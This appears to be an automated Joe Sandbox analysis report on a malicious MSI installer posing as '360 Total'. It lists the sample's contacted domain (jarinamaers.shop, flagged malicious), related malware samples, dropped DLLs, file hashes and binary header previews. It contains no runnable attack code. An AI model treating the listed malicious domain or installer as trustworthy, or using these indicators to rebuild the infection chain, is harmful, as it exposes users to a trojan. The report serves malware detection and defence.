https://jarinamaers.shop/live/06	rundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jarinamaers.shop/live/zTEum	rundll32.exe, 00000007.00000003.3230577585.0000020959F34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jarinamaers.shop/	rundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://pscan.f.360.cn/safe_update.php	rundll32.exe	false		high
https://jarinamaers.shop/live/ace	rundll32.exe, 00000007.00000002.3348585444.0000020959E88000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://dr.f.360.cn/scanlist	rundll32.exe, 00000006.00000003.2111415783.0000026387FC0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000007.00000002.3347746498.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_71a2ec86.dll.6.dr, 360total.dll.2.dr	false		high
https://www.thawte.com/cps0/	ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.dr	false		high
https://jarinamaers.shop/live/I	rundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pscan.f.360.cn/safe_update.phphttp://pconf.f.360.cn/safe_update.phphttp://sconf.f.360.cn/clie	rundll32.exe, 00000006.00000003.2111415783.0000026387FC0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000007.00000002.3347746498.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_71a2ec86.dll.6.dr, 360total.dll.2.dr	false		high
https://www.thawte.com/repository0W	ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.dr	false		high
http://sconf.f.360.cn/client_security_conf	rundll32.exe	false		high
http://dr.f.360.cn/scan	rundll32.exe	false		high
https://jarinamaers.shop/d	rundll32.exe, 00000007.00000003.3230609342.0000020959EEF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3348585444.0000020959EE8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.advancedinstaller.com	ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.46.75	jarinamaers.shop	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1431884
Start date and time:	2024-04-25 22:42:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ad.msi
Detection:	MAL
Classification:	mal88.troj.evad.winMSI@12/30@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 38 Number of non-executed functions: 327
Cookbook Comments:	Found application associated with file extension: .msi

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: ad.msi

Simulations

Behavior and APIs

Time	Type	Description
22:43:35	API Interceptor	5151031x Sleep call for process: rundll32.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://fusiongsb.com/wofice/	Get hash	malicious	Unknown	Browse	104.21.20.41
	https://c-m-c-group.com/	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.2.184
	https://falic.co/office/office_cookies/main/	Get hash	malicious	Unknown	Browse	172.67.212.156
	https://autode.sk/4bb5BeV	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.27.92
	https://lide.alosalca.fun/highbox#joeblow@xyz.com	Get hash	malicious	HTMLPhisher	Browse	104.26.13.205
	https://www.bing.com/ck/a?!&&p=8c604c2d3901cb1eJmltdHM9MTcxMjc5MzYwMCZpZ3VpZD0wODdjNjgyYy00N2ZlLTYyOGQtMzA1ZC03YmVmNDY5NTYzNjUmaW5zaWQ9NTE2MQ&ptn=3&ver=2&hsh=3&fclid=087c682c-47fe-628d-305d-7bef46956365&u=a1aHR0cHM6Ly9rZWljb3NlY3VyaXR5LmNvbS5teC8&ntb=1	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://u18727881.ct.sendgrid.net/ls/click?upn=u001.C98xKppRPMcm9u3MCGfzKZoMS1OpBvTt67698T0dL36uvjeaIcwJCGWCF40JX0jTgfIq_7OnzmxzMpUZLpDhO-2FIQbFKADvzXAOcu2Z6qDokXjolLBB1Q9VRzsF9K8mIjVEFl-2BHay6WBbN5WlzpyVSr4HVkHTzvzCtmwku69-2FJZyLx3-2B4ShTXTnPqinKBtOGbSRbSYGRG3Lt22AUmt-2BZ99sH-2B6Jqf0nt-2BFsnaCp0VSm16eoPdzoH74Sn7jINM2DWCxglARpPWuPOE3iiXY03LGL6ko4g-3D-3D	Get hash	malicious	Unknown	Browse	1.1.1.1
	http://asana.wf	Get hash	malicious	Unknown	Browse	172.67.74.152
	https://url.us.m.mimecastprotect.com/s/qkT5Cv2pWyUOjZODty9fnF?domain=google.com	Get hash	malicious	Unknown	Browse	104.22.75.216
	23-April-24-ACH-29be82ea.jar	Get hash	malicious	Unknown	Browse	172.67.168.231

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.32374.20351.xlsx	Get hash	malicious	Unknown	Browse	104.21.46.75
	SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.21.46.75
	ProconGO1121082800.LnK.lnk	Get hash	malicious	Unknown	Browse	104.21.46.75
	file.exe	Get hash	malicious	Clipboard Hijacker, RisePro Stealer	Browse	104.21.46.75
	Version.125.7599.75.js	Get hash	malicious	SocGholish	Browse	104.21.46.75
	Database4.exe	Get hash	malicious	Unknown	Browse	104.21.46.75
	lzShU2RYJa.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	104.21.46.75
	XV9q6mY4DI.exe	Get hash	malicious	Babuk, Djvu	Browse	104.21.46.75
	n8XBpFdVFU.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	104.21.46.75
	R5391762lf.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	104.21.46.75

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\MSIB1DF.tmp	avp.msi	Get hash	malicious	Unknown	Browse
	Cheater Pro 1.6.0.msi	Get hash	malicious	Unknown	Browse
	Cheat Lab 2.7.2.msi	Get hash	malicious	Unknown	Browse
	payload.js	Get hash	malicious	Unknown	Browse
	payload.js	Get hash	malicious	Unknown	Browse
	Doc_m42_81h118103-88o62135w8623-1999q9.js	Get hash	malicious	Unknown	Browse
	avp.msi	Get hash	malicious	Unknown	Browse
	sharepoint.msi	Get hash	malicious	Unknown	Browse
	slack.msi	Get hash	malicious	Bazar Loader	Browse
	out_bdrts.js	Get hash	malicious	Bazar Loader	Browse
C:\Users\user\AppData\Local\Temp\MSIB151.tmp	avp.msi	Get hash	malicious	Unknown	Browse
	Cheater Pro 1.6.0.msi	Get hash	malicious	Unknown	Browse
	Cheat Lab 2.7.2.msi	Get hash	malicious	Unknown	Browse
	payload.js	Get hash	malicious	Unknown	Browse
	payload.js	Get hash	malicious	Unknown	Browse
	Doc_m42_81h118103-88o62135w8623-1999q9.js	Get hash	malicious	Unknown	Browse
	avp.msi	Get hash	malicious	Unknown	Browse
	sharepoint.msi	Get hash	malicious	Unknown	Browse
	slack.msi	Get hash	malicious	Bazar Loader	Browse
	out_bdrts.js	Get hash	malicious	Bazar Loader	Browse

Created / dropped Files

:wtfbbq (copy)

Process:	C:\Windows\System32\rundll32.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	906752
Entropy (8bit):	6.2833336520446625
Encrypted:	false
SSDEEP:	12288:gfPSAAUHV4fZUv/TrguVTax7hNRu18VA8JFoxMk/wYeDKDMyAmp:qPSAAUHV4fZUvfgmaxpu1F8J6xMYHMBS
MD5:	74143402C40AC2E61E9F040A2D7E2D00
SHA1:	4053DC85BB86C47C63F96681D6A62C21CD6342A3
SHA-256:	1625AC230AA5CA950573F3BA0B1A7BD4C7FBD3E3686F9ECD4A40F1504BF33A11
SHA-512:	4AA55B859F15BE8B14C4A0FF6F3971F49B47C1C8C8427F179EB4AB0C76E321441ADFD173469FACB12AAE1E81E25F1328FD621214B42E66F690BA4E9EE1E54CF9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Reputation:	low
Preview:	MZ......................@...................................h...........!..L.!This program cannot be run in DOS mode....$........,>5.MPf.MPf.MPf.<Qg.MPf..Qg.MPf.%Tg.MPf.%Sg.MPf.&Ug.MPf-$Qg.MPf.<Ug.MPf.<Ug.MPf+.f.MPf/$Tg.MPf.Ug.MPf.Tg.MPf/$Ug.MPf.$Ug.MPf.%Ug.MPf.&Tg.MPf.&Vg.MPf.&Qg.MPf.MQfoLPf.$Yg.MPf.$Pg.MPf.$.f.MPf.M.f.MPf.$Rg.MPfRich.MPf................PE..d...:5.`..........# .....J..........`........................................@............ ..........................................+......`,..,....0...........d......H?...@..........T.......................(....................`...............................text...(I.......J.................. ..`.rdata.......`.......N..............@..@.data....e...P...0...<..............@....pdata...d.......f...l..............@..@.rsrc........0......................@..@.reloc.......@......................@..ByhDm^........P.........................@.........^EbkSBi$)eAX>u5kZ*^3GxY+_By3IAMem4Y^@h^vhh6CfaeU6j.....................................

C:\Config.Msi\62b2e9.rbs

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
Size (bytes):	1215
Entropy (8bit):	5.6668025219816505
Encrypted:	false
SSDEEP:	24:W/gyI269VE6jIMaI3I4iItRpU/e+FPwai6aiDDhiSrokfzs6LK:0BO99jhaxt+buP1iviDD8Sr0
MD5:	85E82CDD14F750E1D2EF84082D88E443
SHA1:	D65B59D9968CA102A41C980C7E28011C28153F98
SHA-256:	09CF215DEB1FCF9A10D01B7353060558B959E4998DB582E0BBE9A61927E9FCFC
SHA-512:	FAAD67821948E69A3505DA147C25581CD9F552085F69D0CFB0042123A1594B341C9BFF85BC59B7D1F70332B092B1893EB620D9E02B9E6E83A5AF927DDC440BBB
Malicious:	false
Reputation:	low
Preview:	...@IXOS.@.....@`..X.@.....@.....@.....@.....@.....@......&.{B135729E-0574-44D1-B7A1-6E44550F506B}..360 Total..ad.msi.@.....@.....@.....@........&.{805E70A6-23C0-4688-BBAF-6F995BB72730}.....@.....@.....@.....@.......@.....@.....@.......@......360 Total......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}&.{B135729E-0574-44D1-B7A1-6E44550F506B}.@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}&.{B135729E-0574-44D1-B7A1-6E44550F506B}.@......&.{ADF9F598-7B84-45C9-B1CA-E80968A538BA}&.{B135729E-0574-44D1-B7A1-6E44550F506B}.@........CreateFolders..Creating folders..Folder: [1]#.9.C:\Users\user\AppData\Roaming\HuMaster LLC\360 Total\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]..+.C:\Users\user\AppData\Local\sharepoint\....7.C:\Users\user\AppData\Local\sharepoint\360total.dll....WriteRegistryValues..Writing system reg

C:\Users\user\AppData\Local\Temp\MSIB151.tmp

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: avp.msi, Detection: malicious, Browse Filename: Cheater Pro 1.6.0.msi, Detection: malicious, Browse Filename: Cheat Lab 2.7.2.msi, Detection: malicious, Browse Filename: payload.js, Detection: malicious, Browse Filename: payload.js, Detection: malicious, Browse Filename: Doc_m42_81h118103-88o62135w8623-1999q9.js, Detection: malicious, Browse Filename: avp.msi, Detection: malicious, Browse Filename: sharepoint.msi, Detection: malicious, Browse Filename: slack.msi, Detection: malicious, Browse Filename: out_bdrts.js, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSIB1DF.tmp

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: avp.msi, Detection: malicious, Browse Filename: Cheater Pro 1.6.0.msi, Detection: malicious, Browse Filename: Cheat Lab 2.7.2.msi, Detection: malicious, Browse Filename: payload.js, Detection: malicious, Browse Filename: payload.js, Detection: malicious, Browse Filename: Doc_m42_81h118103-88o62135w8623-1999q9.js, Detection: malicious, Browse Filename: avp.msi, Detection: malicious, Browse Filename: sharepoint.msi, Detection: malicious, Browse Filename: slack.msi, Detection: malicious, Browse Filename: out_bdrts.js, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSIB1FF.tmp

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSIB22F.tmp

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSIB25F.tmp

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSIB29F.tmp

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\sharepoint\360total.dll

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	906752
Entropy (8bit):	6.2833336520446625
Encrypted:	false
SSDEEP:	12288:gfPSAAUHV4fZUv/TrguVTax7hNRu18VA8JFoxMk/wYeDKDMyAmp:qPSAAUHV4fZUvfgmaxpu1F8J6xMYHMBS
MD5:	74143402C40AC2E61E9F040A2D7E2D00
SHA1:	4053DC85BB86C47C63F96681D6A62C21CD6342A3
SHA-256:	1625AC230AA5CA950573F3BA0B1A7BD4C7FBD3E3686F9ECD4A40F1504BF33A11
SHA-512:	4AA55B859F15BE8B14C4A0FF6F3971F49B47C1C8C8427F179EB4AB0C76E321441ADFD173469FACB12AAE1E81E25F1328FD621214B42E66F690BA4E9EE1E54CF9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...................................h...........!..L.!This program cannot be run in DOS mode....$........,>5.MPf.MPf.MPf.<Qg.MPf..Qg.MPf.%Tg.MPf.%Sg.MPf.&Ug.MPf-$Qg.MPf.<Ug.MPf.<Ug.MPf+.f.MPf/$Tg.MPf.Ug.MPf.Tg.MPf/$Ug.MPf.$Ug.MPf.%Ug.MPf.&Tg.MPf.&Vg.MPf.&Qg.MPf.MQfoLPf.$Yg.MPf.$Pg.MPf.$.f.MPf.M.f.MPf.$Rg.MPfRich.MPf................PE..d...:5.`..........# .....J..........`........................................@............ ..........................................+......`,..,....0...........d......H?...@..........T.......................(....................`...............................text...(I.......J.................. ..`.rdata.......`.......N..............@..@.data....e...P...0...<..............@....pdata...d.......f...l..............@..@.rsrc........0......................@..@.reloc.......@......................@..ByhDm^........P.........................@.........^EbkSBi$)eAX>u5kZ*^3GxY+_By3IAMem4Y^@h^vhh6CfaeU6j.....................................

C:\Users\user\AppData\Roaming\Custom_update\Update_71a2ec86.dll

Process:	C:\Windows\System32\rundll32.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	906752
Entropy (8bit):	6.2833336520446625
Encrypted:	false
SSDEEP:	12288:gfPSAAUHV4fZUv/TrguVTax7hNRu18VA8JFoxMk/wYeDKDMyAmp:qPSAAUHV4fZUvfgmaxpu1F8J6xMYHMBS
MD5:	74143402C40AC2E61E9F040A2D7E2D00
SHA1:	4053DC85BB86C47C63F96681D6A62C21CD6342A3
SHA-256:	1625AC230AA5CA950573F3BA0B1A7BD4C7FBD3E3686F9ECD4A40F1504BF33A11
SHA-512:	4AA55B859F15BE8B14C4A0FF6F3971F49B47C1C8C8427F179EB4AB0C76E321441ADFD173469FACB12AAE1E81E25F1328FD621214B42E66F690BA4E9EE1E54CF9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...................................h...........!..L.!This program cannot be run in DOS mode....$........,>5.MPf.MPf.MPf.<Qg.MPf..Qg.MPf.%Tg.MPf.%Sg.MPf.&Ug.MPf-$Qg.MPf.<Ug.MPf.<Ug.MPf+.f.MPf/$Tg.MPf.Ug.MPf.Tg.MPf/$Ug.MPf.$Ug.MPf.%Ug.MPf.&Tg.MPf.&Vg.MPf.&Qg.MPf.MQfoLPf.$Yg.MPf.$Pg.MPf.$.f.MPf.M.f.MPf.$Rg.MPfRich.MPf................PE..d...:5.`..........# .....J..........`........................................@............ ..........................................+......`,..,....0...........d......H?...@..........T.......................(....................`...............................text...(I.......J.................. ..`.rdata.......`.......N..............@..@.data....e...P...0...<..............@....pdata...d.......f...l..............@..@.rsrc........0......................@..@.reloc.......@......................@..ByhDm^........P.........................@.........^EbkSBi$)eAX>u5kZ*^3GxY+_By3IAMem4Y^@h^vhh6CfaeU6j.....................................

C:\Windows\Installer\62b2e8.msi

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {805E70A6-23C0-4688-BBAF-6F995BB72730}, Number of Words: 10, Subject: 360 Total, Author: HuMaster LLC, Name of Creating Application: 360 Total, Template: ;1033, Comments: This installer database contains the logic and data required to install 360 Total., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
Category:	dropped
Size (bytes):	1619456
Entropy (8bit):	7.152500797895932
Encrypted:	false
SSDEEP:	49152:QZH3YuW8zBQSc0ZnSKmZKumZr7A2BQTBG:+Y90Zn0K/A2OF
MD5:	666151C11B7899A0C764ABE711D3F9B3
SHA1:	35462114E096F4D307607D713136BFE38479870D
SHA-256:	8041A15E27C785F2ADCCE9E8C643F5CC619B52E50CD36FF043D13C4089CE1CAD
SHA-512:	835FEE905D540F1E3B4D32A0645041C9ADD6EA488675A8CA99DBE571CFAAEF5781BED8C1277DD7942BE7D672945D68A1016C2AB5CB645D539E07893D69672ADC
Malicious:	false
Preview:	......................>.......................................................E.......a...............................(...)......+...,...-...........A...B...C...D...E...F...............................................................................................................................................................................................................................................................................................................................................................;...........!...3............................................................................................... ...+..."...#...$...%...&...'...(...)......1...,...-......./...0...4...2...:...?...5...6...7...8...9...>...<.......=...........@...A...B...C...D...........G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Windows\Installer\MSIB539.tmp

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
